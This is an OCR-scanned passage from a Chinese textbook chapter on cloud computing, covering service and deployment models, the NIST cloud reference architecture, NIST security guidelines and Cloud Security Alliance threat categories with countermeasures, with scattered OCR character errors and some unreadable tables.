应 用 程序 的 工具 。 事 实 上 ，PaaS 是 云 中 的 一 个 操作 系统 。Paas 对 于 希望 开发 新 的 或 定制 应 
用 程序 的 组 织 而 言 非常 有 用 ， 同 时 仅 在 其 需要 时 提供 所 需 的 计算 资源 。PaaS 的 典型 例子 包括 
AppEngine Engine Yard, Heroku, Microsoft Azure, Force.com 和 Apache Stratos 等 。 

基础 设施 即 服务 ”借助 IaaS， 客 户 可 以 访问 底层 云 基础 设施 的 资源 。 云 服务 客户 无 须 管 理 
或 控制 底层 云 基础 设施 的 资源 ， 但 可 以 控制 操作 系统 和 部 署 的 应 用 程序 ， 并 可 能 对 特定 网 络 组 
件 (如 主机 防火 墙 ) 进行 有 限 控制 。Iaag 提供 虚拟 机 和 其 他 虚拟 硬件 及 操作 系统 。Iaas 提供 给 
客户 处 理 器 、 存 储 器 、 网 络 以 及 其 他 基础 计算 资源 ， 以 便 客户 能 够 部 署 和 运行 任意 的 软件 ， 例 
如 操作 系统 和 应 用 程序 。IaaS 人 允许 客户 组 合 基本 计算 服务 ， 如 数据 处 理 和 数据 存储 ， 以 构建 更 
合适 的 计算 机 系统 。 

通常 ， 客 户 可 以 使 用 基于 Web 的 图 形 用 户 界面 自行 配置 此 基础 设施 ， 作 为 整个 环境 的 
IT 操作 管理 控制 台 。 对 基础 设施 的 API 访 问 也 可 以 作为 IT 操作 管理 控制 台 选 项 提供 。IaaS 
的 例子 包括 Amazon Elastic Compute Cloud ( Amazon EC2 )、Microsoft Windows Azure、Google 
Compute Engine (GCE) 和 Rackspace。 图 13-2 比较 了 云 服务 提供 者 为 三 种 服务 模型 实施 的 功能 。 


传统 的 IT 场合 基础 设施 即 服务 平台 即 服务 软件 即 服务 











D 客户 管理 O 云 服务 提供 者 管理 
图 13-2 云 服务 模型 中 的 责任 分 离 
13.1.3” 云 部 署 模型 


许多 企业 将 大 部 分 甚至 全 部 IT 运营 迁移 到 企业 云 计 算 中 ， 这 种 主流 趋势 使 企业 面临 着 云 
所 有 权 和 管理 方面 的 一 系列 选择 。 在 本 小 节 中 ， 我 们 将 讨论 云 计算 的 四 个 最 重要 的 部 署 模型 。 


427 
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公有 云 ” 公 有 云 基 础 设施 可 供 公 众 或 大 型 工业 集团 使 用 ， 并 由 销售 云 服 务 的 组 织 拥 有 。 云 
提供 者 既 负 责 云 基 础 设施 ， 也 负责 云 中 数据 和 操作 的 控制 。 公 有 云 可 能 由 商业 、 学 术 、 政 府 组 
织 或 它们 的 某 种 组 合 来 管理 和 运营 。 公 有 云 存 在 于 云 服务 提供 者 的 应 用 场景 中 。 

在 公有 云 模型 中 ， 所 有 主要 组 件 位 于 企业 防火 墙 之 外 ， 位 于 多 租户 基础 设施 中 。 应 用 程 
序 和 存储 通过 安全 了 王 在 Internet 上 可 用 ,并 且 可 以 免费 或 以 按 需 付费 的 方式 提供 。 这 种 类 型 的 
云 提供 简单 易 用 的 消费 类 服务 ， 如 Amazon 和 Google 按 需 Web 应 用 程序 或 容量 、Yahoo 邮箱 ， 
以 及 为 照片 提供 免费 存储 空间 的 Facebook 或 LinkedIn 等 社交 媒体 。 尽 管 公 有 云 价 格 低廉 上 且 可 
以 满足 需求 ， 但 其 通常 不 提供 或 提供 较 低 的 SLA， 并 且 可 能 不 会 提供 针对 私有 云 或 混合 云 产 
品 中 能 够 发 现 数据 丢失 或 损坏 的 保证 。 公 有 云 适用 于 云 服 务 客户 ， 以 及 那些 无 须 具 有 与 防火 雯 
相同 服务 级 别 的 实体 。 此 外 ， 公 有 laas 云 无 须 做 出 限制 且 无 须 遵 守 隐 私法 律 ， 进 行 隐私 保护 
仍然 是 用 户 或 企业 终端 的 责任 。 在 许多 公有 云 中 ， 重 点 的 服务 对 象 是 云 服务 客户 和 按 需 付费 的 
中 小 型 企业 ， 其 通 贡 按照 每 千 兆 字 节 几 美 分 的 价格 来 文 付 ， 保 证 可 能 是 照片 和 音乐 共享 、 笔 记 
本 电脑 备份 或 文件 共享 等 服务 。 

公有 云 的 主要 优势 是 成 本 ,组 织 仅 支 付 所 需 的 服务 和 资源 ， 并 可 根据 需要 进行 调整 。 此 
外 ， 用 户 大 大 减少 了 管理 开销 。 安 全 是 用 户 关 心 的 主要 问题 ， 即 使 许多 公有 云 提供 者 已 经 展示 
出 强大 的 安全 控制 能 力 ， 然 而 事实 上 这 些 提供 者 可 能 用 更 多 的 资源 和 专业 知识 来 致力 于 提升 私 
有 云 的 安全 性 。 

私有 云 ” 私 有 云 在 组 织 的 内 部 IT 环境 中 实施 。 组 织 可 以 选择 管理 内 部 的 云 ， 或 将 管理 
职能 通过 合同 承包 给 第 三 方 。 此 外 ， 云 服务 器 和 存储 设备 可 能 部 署 在 内 部 、 外 部 或 两 者 兼 而 
AZo 

私有 云 可 以 通过 内 部 网 络 或 经 由 一 个 虚拟 私有 网 络 (VPN) 的 Internet 将 IaaS 提供 给 内 部 
的 员工 或 业务 部 门 ， 以 及 将 软件 〈 应 用 程序 ) 或 存储 作为 服务 提供 给 分 文 机 构 。 在 这 两 种 情况 
下 ， 私 有 云 都 利用 现 有 基础 设施 ， 从 保护 组 织 网 络 隐私 出 发 提供 或 收回 绑 定 的 服务 或 全 部 的 服 
务 。 通 过 私有 云 提供 的 服务 示例 包括 按 需 数据 库 、 按 需 电 子 邮 件 和 按 需 存储 等 。 

选择 私有 云 的 主要 动机 是 安全 性 。 私 有 云 基础 设施 可 以 更 加 严格 地 控制 数据 存储 的 地 理 位 
置 和 其 他 方面 的 安全 。 其 他 优势 还 包括 简单 资源 共享 和 快速 部 署 到 组 织 实体 。 

社区 云 ” 社 区 云 具 有 私有 云 和 公有 云 的 特征 。 类 似 于 私有 云 ， 社 区 云 也 限制 了 访问 。 类 似 
于 公有 云 ， 社 区 云 的 云 资源 由 多 个 独立 组 织 共享 。 共 享 社区 云 的 组 织 具有 相似 的 需求 ， 通 常 需 
要 彼此 交换 数据 。 医 疗 保健 行业 是 应 用 社区 云 概念 的 一 个 行业 示例 。 社 区 云 可 以 以 符合 政府 隐 
私 和 其 他 规定 的 方式 实施 。 社 区 参与 者 可 以 以 受 控 的 方式 交换 数据 。 

云 基 础 设施 可 能 由 参与 组 织 或 第 三 方 管理 ， 并 且 可 能 在 内 部 或 外 部 存在 。 在 这 种 部 署 模型 
中 ， 成 本 分 散在 比 公 有 云 少 〈 但 比 私 有 云 多 ) 的 用 户 上 ， 因 此 社区 云 只 能 实现 云 计算 的 部 分 成 
本 节约 。 

混合 云 ” 混 合 云 基础 设施 由 两 个 或 更 多 云 (私有 云 、 社 区 云 或 公有 云 ) 组 成 ， 它 们 仍然 是 
独特 的 实体 ， 但 通过 标准 化 或 专 有 技术 绑 定 在 一 起 ， 从 而 实现 数据 和 应 用 程序 的 可 移植 性 ( 例 
如 ， 用 于 云 之 间 负 载 平 衡 的 云 爆发 )。 利 用 混合 云 解决 方案 ， 敏 感度 较 高 的 信息 可 以 放置 在 云 
的 私有 区 域 ， 敏 感度 较 低 的 数据 则 可 以 充分 利用 公有 云 的 优势 。 

混合 型 公有 /私有 云 解决 方案 对 小 型 企业 尤其 具有 吸引 力 。 较 少 关注 安全 问题 的 应 用 程序 
可 以 放 到 公有 云 上 以 大 幅 节 省 成 本 ， 而 更 敏感 的 数据 和 应 用 程序 则 应 放 到 私有 云 上 。 表 13-1 
列 出 了 四 种 云 部 署 模型 的 一 些 相 对 优势 和 劣势 。 
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表 13-1 云 部 署 模 型 的 比较 
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13.1.4 云 计 算 参 考 架 构 
NIST SP 500-292 (NIST 云 计算 参 考 架 构 ，2011 年 9 A) 构建 了 参考 架构 ， 描 述 如 下 : 


NIST 云 计算 参考 架构 的 重点 在 于 提供 “什么 样 ”的 云 服 务 ， 而 非 “ 如 何 ” 提 出 解决 方案 
和 给 出 具体 实现 。 参 考 架构 旨 在 帮助 理解 云 计算 中 的 复杂 操作 。 它 并 不 代表 特定 云 计算 系 





统 的 系统 架构 ， 而 是 一 种 利用 通用 参考 结构 来 描述 、 探 讨 和 开发 特定 系统 架构 的 工具 。 


NIST 开发 了 具有 以 下 预期 目标 的 参考 架构 : 

© 在 整体 云 计算 概念 模型 的 上 下 文中 说 明和 理解 各 种 云 服务 。 

e 提供 一 个 有 助 于 云 服 务 客 户 理解 、 探 讨 、 分 类 和 比较 云 服 务 的 技术 性 参考 。 

© 便于 进行 各 方面 分 析 的 候选 标准 ， 包 括 安全 性 、 互 操作 性 、 可 移植 性 以 及 可 参考 实现 。 
如 图 13-3 所 示 ， 该 参考 架构 依据 任务 和 职责 定义 了 五 种 主要 角色 : 

© 云 服务 客户 (CSC); 与 云 提 供 者 保持 商业 往来 或 使 用 云 提供 者 服务 的 个 人 或 组 织 。 

© 云 服务 提供 者 (CSP): 负责 向 感 兴趣 的 各 方 提供 服务 的 个 人 、 组 织 或 实体 。 

云 审计 者 : 对 云 服务 、 信 息 系统 操作 、 性 能 以 及 云 实现 的 安全 性 进行 独立 评估 的 团体 。 
云 经 纪 人 : 管理 云 服务 的 使 用 、 性 能 和 分 配 的 实体 ， 且 可 调节 云 客户 和 云 服务 提供 者 
之 间 的 关系 。 





图 13-3 NIST 云 计算 参考 架构 


云 客 户 和 云 提供 者 的 角色 在 之 前 已 经 讨论 过 了 。 总 而 言 之 ， 云 服务 提供 者 可 以 提供 一 
种 或 多 种 云 服 务 ， 以 满足 云 服 务 客 户 的 全 或 商业 需求 。 对 于 每 种 服务 模型 (SaaS, PaaS 和 
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IaaS), CSP 提供 支持 该 服务 模型 所 需 的 存储 和 处 理 设 施 ， 以 及 供 云 服 务 客户 使 用 的 云 接口 。 
在 SaaS 中 ，CSP 在 云端 基础 设施 上 部 署 、 配 置 、 维 护 以 及 升级 软件 应 用 ， 以 便服 务 以 预期 
的 服务 等 级 被 提供 给 云 客 户 。Saasg 的 客户 可 以 是 组 织 (该 组 织 为 其 成 员 设 置 软件 应 用 的 准 入 
制度 )， 也 可 以 是 直接 使 用 软件 应 用 的 终端 用 户 ， 抑 或 是 为 终端 用 户 配置 应 用 的 软件 应 用 管 
理 员 。 
在 PaaS 中 ，CSP 管理 用 于 搭载 平台 的 计算 基础 设施 ， 并 且 运 行 用 于 支持 平台 组 件 的 云端 
软件 ， 例 如 运行 软件 执行 栈 、 数 据 库 以 及 其 他 中 间 组 件 。Paas 的 云 客户 可 以 向 CSP 租用 工具 
和 执行 资源 ， 以 开发 、 测 试 、 部 署 和 管理 位 于 云 环 境 中 的 应 用 程序 。 
在 laaS 中 ，CSP 获取 服务 底层 的 物理 计算 资源 ， 包 括 服 务 硕 、 网 络 、 存 储 丹 以 及 主机 基 
础 设施 。IaaS 的 云 客户 依次 使 用 这 些 计算 资源 (如 虚拟 机 )， 以 满足 基础 计算 所 需 。 
云 运 营 者 是 一 个 网 络 设施 ， 用 于 云 客户 与 CSP 之 间 的 云 服 务 连接 和 传输 。 通 常 ，CSP 会 
与 云 运营 者 签订 服务 等 级 协议 (SLA)， 以 提供 与 向 云 客 户 提供 的 SLA 级 别 一 致 的 服务 ， 并 且 
可 能 要 求 云 运营 者 在 云 客户 和 CSP 之 间 提 供 专用 且 安 全 的 连接 。 
当 云 服务 对 于 云 客户 而 言 过 于 复杂 时 ， 云 经 纪 人 可 有 效 地 将 之 简化 处 理 。 云 经 纪 人 可 以 提 
供 以 下 三 方面 的 支持 : 
e 服务 中 介 : 这 是 增值 服务 ， 例 如 身份 管理 、 性 能 报告 以 及 安全 性 提升 。 
e 服务 聚合 : 经 纪 人 结合 多 种 云 服务 以 满足 用 户 需 求 ， 服 务 并 非 来 自 单一 的 CSP ; 经 纪 
人 还 可 以 优化 性 能 和 降低 成 本 。 

e 服务 套利 : 服务 套利 类 似 于 服务 聚合 ， 只 不 过 聚合 的 服务 不 固定 。 服 务 套 利 意 味 着 经 
纪 人 可 以 灵活 地 在 多 个 代理 机 构 之 间 选 择 服务 。 例 如 ， 云 经 纪 人 可 以 利用 信用 评分 服 
务 以 衡量 和 选择 评分 最 高 的 代理 机 构 。 

云 审 计 者 可 以 从 安全 控制 、 隐 私 影响 以 及 性 能 等 多 个 方面 对 CSP 提供 的 服务 做 出 评估 。 
审计 者 是 一 个 独立 的 实体 ， 可 以 确保 CSP 符合 一 系列 的 标准 。 

图 13-4 说 明了 参与 者 之 间 的 相互 作用 。 云 客户 可 以 直接 (或 通过 云 经 纪 人 ) 从 云 提供 者 处 
请 求 云 服务 。 云 审计 者 独立 进行 审计 ， 并 可 能 联系 其 他 人 收集 必要 信息 。 该 图 显示 云 联网 问题 
涉及 三 种 不 同类 型 的 网 络 。 对 于 云 开 发 者 而 言 ， 网 络 架 构 是 典型 的 大 型 数据 中 心 ， 由 大 量 高 性 
能 服务 器 和 存储 设备 组 成 ， 并 与 高 速 架 顶 式 以 太 网 交换 机 相互 连接 。 这 方面 的 关注 焦点 集中 在 
虚拟 机 放置 和 移动 ， 以 及 负载 平衡 和 可 用 性 问题 上 。 企 业 网 络 可 能 具有 完全 不 同 的 体系 结构 ， 
通常 包括 大 量 的 局 域 网 、 服 务 器 、 工 作 站 、 个 人 计算 机 和 移动 设备 ， 并 具有 广泛 的 网 络 性 能 、 
安全 性 和 管理 问题 。 


数据 中 心 网 络 





图 13-4 云 计算 中 参与 者 之 间 的 交互 
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开发 者 和 客户 对 云 运营 者 的 关注 是 与 其 他 很 多 使 用 者 共享 的 ， 他 们 关注 的 是 云 运营 者 是 否 
有 能 力 用 合适 的 SLA 和 安全 保障 的 方式 来 创建 虚拟 网 络 。 


13.2 云 安全 的 概念 


云 安全 包含 许多 方面 ， 而 提供 云 安 全 措施 的 方法 也 有 很 多 。 关 于 云 安全 的 范围 问题 ， 一 
很 好 例子 见 NIST SP 800-144 (公有 云 计 算 的 安全 和 隐私 指南 ，2011 年 12 A) 中 列 出 的 NIST 
云 安全 指南 ， 如 表 13-2 所 示 。 针 对 云 安全 的 完整 讨论 超出 了 本 章 的 范围 。 


表 13-2 NIST 关于 云 安 全 和 隐私 问题 的 指导 方针 和 建议 


治理 

扩展 关于 云 中 用 于 应 用 程序 开发 和 服务 供应 的 策略 、 过 程 和 标准 的 组 织 实践 ， 以 及 所 部 署 或 参与 的 服务 的 设 
计 、 实 施 、 测 试 、 使 用 和 监控 

建立 审计 机 制 和 工具 ， 以 确保 在 整个 系统 生命 周期 内 遵循 组 织 实践 要 求 


合 规 

了 解 在 组 织 中 实施 的 安全 和 隐私 义务 ， 以 及 潜在 影响 云 计算 措施 的 各 类 法 律 法 规 ， 特 别 是 涉及 数据 位 置 、 隐 私 
和 安全 控制 、 记 录 管 理 以 及 电子 举证 需求 等 方面 的 内 容 

审查 并 评估 云 提供 者 提供 的 服务 是 否 满足 组 织 的 需求 ， 并 确保 合同 条 款 充 分 满足 需求 

确保 云 提供 者 的 电子 举证 需求 功能 和 流程 不 会 损害 数据 和 应 用 程序 的 隐私 或 安全 


信任 
确保 服务 具有 足够 的 方法 来 让 云 服务 提供 者 所 使 用 的 安全 性 和 隐私 控制 、 流 程 及 其 性 能 等 全 程 可 见 
建立 清晰 、 独 有 的 数据 所 有 权 
建立 风险 管理 程序 ， 该 程序 足够 灵活 ， 能 够 应 对 系统 生命 周期 中 不 断 演化 和 转变 的 风险 
持续 监控 信息 系统 的 安全 状态 ， 以 支持 持续 的 风险 管理 决策 


架构 
在 整个 系统 生命 周期 内 以 及 所 有 系统 组 件 中 ， 了 解 云 提供 者 用 于 提供 服务 的 基础 技术 ， 包 括 涉及 的 技术 控制 对 
系统 安全 和 隐私 的 影响 


身份 和 访问 管理 
确定 有 足够 的 安全 措施 来 实现 适用 于 组 织 的 身份 验证 、 授 权 以 及 其 他 身份 和 访问 管理 功能 


软件 隔离 
了 解 云 提供 者 在 其 多 租户 软件 体系 结构 中 采用 的 虚拟 化 和 其 他 逻辑 隔离 技术 ， 并 评估 组 织 面 临 的 风险 


数据 保护 

评估 云 提供 者 的 数据 管理 解决 方案 对 相关 组 织 数 据 的 适用 性 以 及 控制 数据 访问 的 能 力 ， 在 静态 、 传 输 和 使 用 时 
保护 数据 ， 审 查 数据 

考虑 整理 与 其 他 组 织 相 关 的 数据 的 风险 ， 这 些 组 织 的 威胁 特征 较 高 或 其 数据 的 价值 更 大 

利用 云 环境 中 可 用 的 工具 和 云 提供 者 建立 的 流程 ， 充 分 理解 和 权衡 密 钥 管理 中 涉及 的 风险 


可 用 性 

了 解 有 关 可 用 性 、 数 据 备份 和 恢复 以 及 灾难 恢复 的 合同 条 款 和 程序 ， 并 确保 它们 符合 组 织 的 连续 性 和 应 急 计 划 
要 求 

确保 在 中 期 或 长 期 的 中 断 期 间或 者 严重 灾难 期 间 ， 可 以 立即 恢复 关键 操作 ， 并 且 所 有 操作 最 终 都 能 够 及 时 且 有 
组 织 地 恢复 


事件 月 应 
了 解 事件 响应 的 合同 条 款 和 程序 ， 并 确保 它们 符合 组 织 的 要 求 
确保 云 提供 者 具有 透明 的 响应 流程 ， 并 在 事件 发 生 期 间 和 事件 发 生 后 有 足够 的 信息 共享 机 制 
确保 组 织 能 够 根据 各 自 的 计算 环境 角色 和 职责 ， 与 云 提供 者 协调 一 致 地 响应 事件 


13.2.1 云 计算 的 安全 问题 
安全 对 于 任何 计算 基础 设施 都 很 重要 。 各 公司 都 会 竭尽 全 力 保 护 本 地 计算 系统 ， 因 此 ,在 
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增加 或 替换 使 用 云 服 务 的 本 地 系统 时 ， 安 全 问题 是 一 个 主要 考虑 因素 ， 这 并 不 奇怪 。 解 决 安全 
问题 通常 是 进一步 讨论 将 组 织 的 部 分 或 全 部 计算 架构 迁移 到 云 的 先决 条 件 。 而 可 用 性 是 另 一 个 
主要 问题 。 

一 般 来 说 ， 只 有 当 企业 考虑 将 核心 事务 处 理 (如 企业 资源 规划 (Enterprise Resource Planning, 
ERP) 系统 ) 和 其 他 关键 应 用 程序 迁移 到 云 时 ， 才 会 出 现 此 类 问题 。 尽 管 这 些 应 用 程序 维护 着 
敏感 信息 ， 但 一 直 以 来 ， 公 司 对 于 将 高 级 维护 应 用 程序 (如 电子 邮件 和 工资 单 ) 迁移 到 云 服务 
提供 者 都 不 怎么 担忧 。 

可 审计 性 是 许多 组 织 的 另 一 个 关注 点 。 例 如 ， 在 美国 ， 许 多 组 织 必须 遵守 院 班 斯 - oe 
斯 利 法 案 ( Sarbanes-Oxley) 以 及 健康 和 人 类 服务 健康 保险 流通 与 责任 法 案 ( Health Insurance 
Portability and Accountability Act, HIPAA) 的 规定 。 无 论 数据 是 存储 在 本 地 还 是 迁移 到 云 ， 都 
必须 确保 它 的 可 审计 性 。 

在 将 关键 基础 设施 迁移 到 云 之 前 ， 企 业 应 该 对 云 外 部 和 内 部 的 安全 威胁 进行 详尽 的 调 
查 。 和 保护 云 免 于 外 部 威胁 相关 的 许多 安全 问题 与 传统 上 面临 的 集中 式 数据 中 心 的 安全 问 
题 类 似 。 然 而 ， 在 云 中 ， 确 保 足 够 安全 的 责任 经 常 由 客户 、 提 供 者 以 及 客户 依赖 的 安全 敏 
感 软件 或 配置 的 任何 第 三 方 公司 共同 承担 。 云 客户 负责 应 用 程序 级 别 的 安全 。 云 提供 者 负 
责 物理 安全 和 部 分 软件 安全 ， 例 如 执行 外 部 防火 墙 策 略 。 而 软件 堆栈 中 间 层 的 安全 由 客户 
和 提供 者 共同 负责 。 

考虑 问 云 迁移 的 公司 不 应 忽视 某 些 安 全 风险 ， 即 与 其 他 云 客户 共享 提供 者 资源 所 市 来 的 
安全 风险 。 云 提供 者 必须 防范 用 户 的 盗 穷 或 拒绝 服务 攻击 ， 用 户 之 间 也 需要 彼此 防范 。 虚 拟 化 
可 以 成 为 解决 这 些 潜 在 风险 的 强大 机 制 ， 因 为 它 可 以 防止 大 多 数 的 用 户 彼此 攻击 或 对 提供 者 的 
基础 设施 进行 攻击 。 但 是 ， 并 非 所 有 资源 都 是 虚拟 化 的 ， 而 且 并 非 所 有 虚拟 化 环境 都 是 无 缺陷 
的 。 不 正确 的 虚拟 化 可 能 允许 用 户 代码 访问 提供 者 基础 设施 的 敏感 部 分 或 其 他 用 户 的 资源 。 此 
外 ， 这 些 安全 问题 并 非 是 云 所 特有 的 ， 与 管理 非 云 数据 中 心 的 问题 类 似 ， 不 同 的 应 用 程序 需要 
彼此 保护 。 

企业 应 考虑 的 另 一 个 安全 问题 是 用 户 受 到 提供 者 保护 的 程度 ， 特 别 是 在 无 意 中 丢 失 数据 的 
情况 下 。 例 如 ， 如 果 提 供 者 改进 基础 设施 ， 那 么 收回 或 更 换 硬件 会 发 生 什 么 情况 ? 很 容易 想象 
的 一 种 情况 是 硬盘 被 丢弃 而 没有 正确 消除 用 户 数据 。 而 另 一 种 情况 是 使 用 户 数据 对 未 经 授权 的 
用 户 可 见 的 权限 漏洞 或 错误 。 用 户 级 加 密 对 用 户 来 说 可 能 是 一 个 重要 的 目 助 机 制 ， 但 企业 应 确 
保 其 他 保护 措施 到 位 ， 以 避免 无 意 中 丢 失 数 据 。 


13.2.2 解决 云 计 算 安全 问题 


已 经 发 布 了 许多 文档 来 指导 与 云 计算 相关 的 安全 问题 的 业务 方向 。 除 了 提供 全 面 指导 的 
NIST SP 800-144 之 外 ， 还 有 NIST SP 800-146 ( 云 计 算 概 要 与 建议 ，2012 年 5 月 )。NIST 的 
建议 系统 地 考虑 了 企业 使 用 的 各 种 主要 云 服 务 类 型 ， 包 括 SaaS, laas 和 PaaS。 虽 然 安 全 问题 
因 云 服务 类 型 的 不 同 而 有 所 不 同 ,但 也 有 多 个 独立 于 服务 类 型 的 NIST ÆN, BA APE, 
NIST 建议 选择 支持 强加 密 的 云 提供 者 ， 采 用 恰当 的 元 余 机 制 和 认证 机 制 ， 并 为 用 户 提 供 足 
够 的 关于 机 制 的 可 预见 性 ， 以 保护 用 户 不 受 其 他 用 户 和 提供 者 的 影响 。NIST SP 800-146 还 
列 出 了 云 计 算 环 境 中 相关 的 整体 安全 控制 ， 并 且 必 须 将 其 分 配给 不 同 的 云 参 与 者 。 这 些 内 容 
如 表 13-3 所 示 。 


R 13-3 ”控制 功能 和 分 类 


mz R iR (F € 理 
访问 控制 意识 和 培训 认证 、 信 赖 和 安全 评估 
审计 和 可 说 明 性 配置 和 管理 规划 风险 评估 
识别 和 认证 应 急 计 划 系统 和 服务 获取 


系统 和 通信 保护 事件 响应 


维护 

媒体 保护 

物理 和 环境 保护 

个 人 安全 系统 与 信息 完整 性 





随 着 越 来 越 多 的 企业 将 云 服务 整合 到 其 企业 网 络 基础 设施 中 ， 云 计算 安全 将 一 直 是 一 个 重 
要 问题 。 云 计算 安全 失败 的 例子 可 能 会 对 云 服 务 的 商业 吸引 力 产 生 负 面 的 影响 。 这 激励 服务 提 
供 者 慎重 考虑 采用 安全 机 制 ， 以 缓解 潜在 用 户 的 担忧 。 一 些 服务 供应 商 已 将 其 运营 转移 到 第 4 
层 数据 中 心 (请 参阅 5.8 节 )， 以 解决 用 户 对 可 用 性 和 元 余 的 担忧 。 由 于 许多 企业 仍 不 愿意 大 举 
采用 云 计 算 ， 因 此 云 服务 提供 者 将 不 得 不 继续 努力 让 潜在 客户 相信 核心 业务 流程 和 任务 关键 应 
用 程序 的 计算 支持 可 以 安全 地 转移 到 云 上 。 


13.3 云 安 全 方 演 
13.3.1 风险 和 对 策 


总 体 来 说 ， 云 计算 中 的 安全 控制 与 其 他 IT 环境 中 的 安全 控制 类 似 。 然 而 ， 由 于 操作 
模型 与 开发 技术 被 用 于 提供 云 服务 ， 因 此 云 计算 可 能 存在 特定 于 云 环境 的 风险 。 基 本 要 求 
是 ， 即 使 企业 失去 了 对 资源 、 服 务 和 应 用 程序 的 大 量 控制 权 ， 它 也 必须 对 安全 和 隐私 政策 
负责 。 

云 安全 联盟 (Cloud Security Alliance，[CSA13]) 列 出 了 以 下 几 种 主要 的 云 安 全 威胁 : 

e 滥用 和 恶意 使 用 云 计算 : 对 于 许多 CSP 而 言 ， 申 请 并 使 用 云 服务 相对 容易 ， 有 些 CSP 
甚至 提供 免费 的 有 限 试用 期 。 这 便 令 攻 击 者 有 机 会 接 人 云端 实施 多 种 攻击 ， 例 如 垃圾 
邮件 、 恶 意 代码 攻击 和 拒绝 服务 攻击 。 一 直 以 来 ，PaaS 提供 者 受到 的 此 类 攻击 最 多 ; 
然而 ， 最 近 的 证 据 表 明 ， 黑 客 也 开始 对 准 IaaS 提供 者 。 抵 御 诸 如 此 类 攻击 对 于 CSP 而 
言 无 疑 是 一 种 负担 ， 但 云 服 务 客 户 端 必须 监控 有 关 其 数据 和 资源 的 活动 ， 以 检测 任何 
恶意 行为 。 

应 对 措施 包括 : BORA TARR; 加 强 信用 卡 欺诈 监 测 和 协调 ; 对 客户 

网 络 流量 进行 全 面 检查 ; 监控 自己 网 络 块 的 公共 黑 名 单 。 
不 安全 接口 与 应 用 程序 编程 接口 (API): CSP 会 发 布 一 系列 的 软件 接口 和 API， 以 便 消 
费 者 能 够 管理 云 服务 并 与 之 交互 。 一 般 云 服务 的 安全 性 和 可 用 性 与 这 些 基础 API 相互 
独立 。 从 认证 和 访问 控制 到 加 密 和 活动 监控 ， 这 些 接口 的 设计 必须 符合 能 够 防止 意外 
和 恶意 尝试 的 规避 策略 。 

应 对 措施 包括 : 分 析 CSP 接口 的 安全 模型 ; 确保 实现 健壮 的 认证 和 访问 控制 ， 并 
配 有 相应 的 加 密 传 输 方式 ， 了 解 与 API 相关 的 依赖 关系 链 。 
恶意 的 内 部 人 员 : 在 云 计 算 示 例 中 ， 组 织 放 弃 了 对 大 部 分 安全 性 的 直接 控制 ， 这 样 就 
对 CSP 赋予 了 前 所 未 有 的 信任 ， 因 此 恶意 的 内 部 人 员 的 风险 活动 是 一 个 严重 的 问题 。 
云 架 构 需 要 某 些 风险 极 高 的 角色 ， 此 类 角色 诸如 CSP 系统 管理 员 和 托管 安全 服务 提 
供 者 。 
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应 对 措施 包括 : 执行 严格 的 供应 链 管 理 并 进行 全 面 的 提供 者 评估 ; 将 人 力 资源 要 
求 列 为 法 律 合 同 的 一 部 分 ; 要 求 整体 信息 安全 、 管 理 实践 以 及 合 规 报告 的 透明 度 ; 确 
定安 全 漏洞 通知 进程 。 

e 技术 共享 问题 : laas 提供 者 通过 共享 基础 设施 以 可 扩展 的 方式 提供 服务 。 通 常 ， 构 成 
这 种 基础 设施 (如 CPU 缓存 、GPU 等 ) 的 底层 组 件 并 非 旨 在 为 多 租户 架构 提供 强大 
的 隔离 性 能 。CSP 通常 通过 为 单独 的 客户 提供 独立 的 虚拟 机 来 应 对 这 种 风险 。 然 而 ， 
这 种 方法 仍然 容易 受到 内 部 人 员 和 外 部 人 员 的 攻击 ， 因 此 只 能 成 为 整体 安全 战略 的 
一 部 人 FF 

应 对 措施 包括 : 实施 安装 /配置 的 安全 最 佳 实践 ; 监视 未 经 授权 的 更 改 /活动 的 环 
境 ; 促进 对 管理 访问 和 操作 的 强 认 证 和 访问 控制 ; 在 补丁 和 漏洞 修复 方面 踢 化 SLA ; 
进行 漏洞 扫描 和 配置 审计 。 

e 数据 丢失 与 泄露 : 对 于 许多 客户 来 说 ， 安 全 汤 洞 所 造成 的 破坏 性 影响 最 大 的 是 数据 的 

丢失 或 泄露 。 我 们 将 在 下 一 节 中 讨论 这 个 问题 。 

应 对 措施 包括 : 实现 健壮 的 API 访问 控制 ; 在 传输 中 和 静态 时 对 数据 加 密 并 保 
护 其 完整 性 ; 在 设计 和 运行 时 分 析 数 据 保护 ; 实现 健壮 的 密 钥 生成 、 存 储 、 管 理 和 
GEE 
MPMARS oF: 账户 和 服务 支持 GAA EPEE) HARA RD. wt oi RE 
书 ， 攻 击 者 可 以 经 常 访问 部 署 云 计算 服务 的 关键 区 域 ， 以 破坏 服务 的 机 密 性 、 完 整 性 
和 可 用 性 。 

应 对 措施 包括 : 禁止 在 用 户 和 服务 之 间 共 享 账户 证 书 ; 尽 可 能 利用 强大 的 双 因 子 
认证 技术 ; 采取 积极 主动 的 监控 措施 ， 以 检测 未 授权 的 行为 ; 理解 CSP 安全 策略 和 
SLA。 

e 未 知 的 风险 状况 : 在 使 用 云端 基础 设施 时 ， 客 户 必须 在 可 能 影响 安全 性 的 许多 问题 上 

将 控制 权 转 让 给 云 提供 者 。 这 样 ， 客 户 端 必须 关注 并 明确 定义 处 理 风险 时 的 各 种 角色 
和 职责 。 例 如 ， 员 工 可 以 在 CSP 上 部 署 应 用 程序 和 数据 资源 ， 而 无 须 遵 守 关 于 隐私 、 
安全 和 监督 的 正常 政策 和 程序 。 

应 对 措施 包括 : 披露 可 应 用 的 日 志和 数据 ; 部 分 /完全 公开 基础 设施 细则 (如 补 
丁 级 别 和 防火 墙 )) 对 必要 信息 进行 监控 和 和 警告。 

欧洲 网 络 与 信息 安全 委员 会 ( European Network and Information Security Agency, [ENIS09] ) 
和 NIST SP 800-144 现 已 发 布 了 类 似 的 列表 。 


13.3.2 云 上 的 数据 保护 


有 许多 方法 可 以 危害 数据 ， 删 除 或 更 改 没 有 备份 的 原始 内 容 记录 就 是 一 个 典型 事例 。 从 数 
量 庞大 的 数据 环境 中 取消 记录 的 链接 可 能 会 导致 无 法 恢复 ， 就 像 存 储 在 不 可 靠 媒 介 上 一 样 。 此 
外 ， 编 码 密 钥 丢失 可 能 会 导致 显著 的 破坏 。 最 后 ， 必 须 防 止 未 经 授权 的 人 访问 敏感 数据 。 

由 于 云 独 有 的 风险 和 挑战 的 数量 以 及 交互 作用 ,或 者 由 于 其 风险 和 挑战 在 云 环 境 染 构 或 操 
作 特 性 的 影响 下 而 变 得 更 危险 ， 因 此 云 中 的 数据 威胁 增加 了 。 

